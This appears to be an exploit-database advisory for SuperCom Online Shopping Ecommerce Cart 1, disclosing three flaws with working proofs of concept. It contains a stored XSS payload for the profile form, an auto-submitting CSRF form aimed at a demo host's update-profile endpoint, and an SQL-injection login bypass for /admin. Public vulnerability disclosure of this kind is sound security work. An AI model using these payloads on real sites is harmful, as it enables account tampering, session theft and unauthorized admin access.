SuperCom Online Shopping Ecommerce Cart 1 - Persistent Cross-Site scripting / Cross site request forgery / Authentication bypass

vendor:

Online Shopping Ecommerce Cart

by:

L0RD

7.5

CVSS

HIGH

Persistent Cross-Site scripting / Cross site request forgery / Authentication bypass

CWE

Product Name: Online Shopping Ecommerce Cart

Affected Version From: 1

Affected Version To: 1

Patch Exists: NO

Related CWE:

CPE:

Metasploit:

Other Scripts:

Platforms Tested: Kali linux

2018

SuperCom Online Shopping Ecommerce Cart 1 – Persistent Cross-Site scripting / Cross site request forgery / Authentication bypass

SuperCom - Online Shopping Ecommerce Cart 1 suffers from multiple vulnerabilities. The first vulnerability is persistent cross-site scripting where an attacker can inject malicious code into the profile update section, which will then execute when the user views their profile. The second vulnerability is cross-site request forgery where an attacker can change the user's authentication directly by creating a malicious form that submits to the update profile endpoint. The third vulnerability is authentication bypass where an attacker can bypass the authentication by using a specific username and password combination.

Mitigation:

The vendor should release a patch that fixes these vulnerabilities. Users should update to the latest version of the software. Additionally, users should be cautious when inputting sensitive information and should only use trusted websites.

Source

Exploit-DB raw data:

# Exploit Title: SuperCom Online Shopping Ecommerce Cart 1 - Persistent Cross-Site scripting / Cross site request forgery / Authentication bypass
# Date: 2018-05-17
# Exploit Author: L0RD
# Vendor Homepage: https://codecanyon.net/item/supercom-online-shopping-ecommerce-cart/17085987?s_rank=1442
# Version: 1
# Tested on: Kali linux

# Description: SuperCom - Online Shopping Ecommerce Cart 1 suffers from multiple vulnerabilities :
# POC 1 : Persistent cross site scripting :

1) After creating an account , go to your profile.
2) Navigate to "Update profile" and put this payload :
"/><script>alert(document.cookie)</script>
3) You will get an alert box in the page .

# POC 2 : CSRF : Attacker can change user's authentication directly :

<html>
<head>
    <title>CSRF POC</title>
</head>
<body>
    <form action="http://ecommerce.thesoftking.com/updateprofile"
method="post">
        <input type="hidden" name="name" value="anything">
        <input type="hidden" name="mobile" value="1000000000">
        <input type="hidden" name="address" value="anything">
    </form>
    <script>
        document.forms[0].submit();
    </script>
</body>
</html>

# POC 3 : Authentication bypass :
Path : /admin
Username : ' or 0=0 #
Password : anything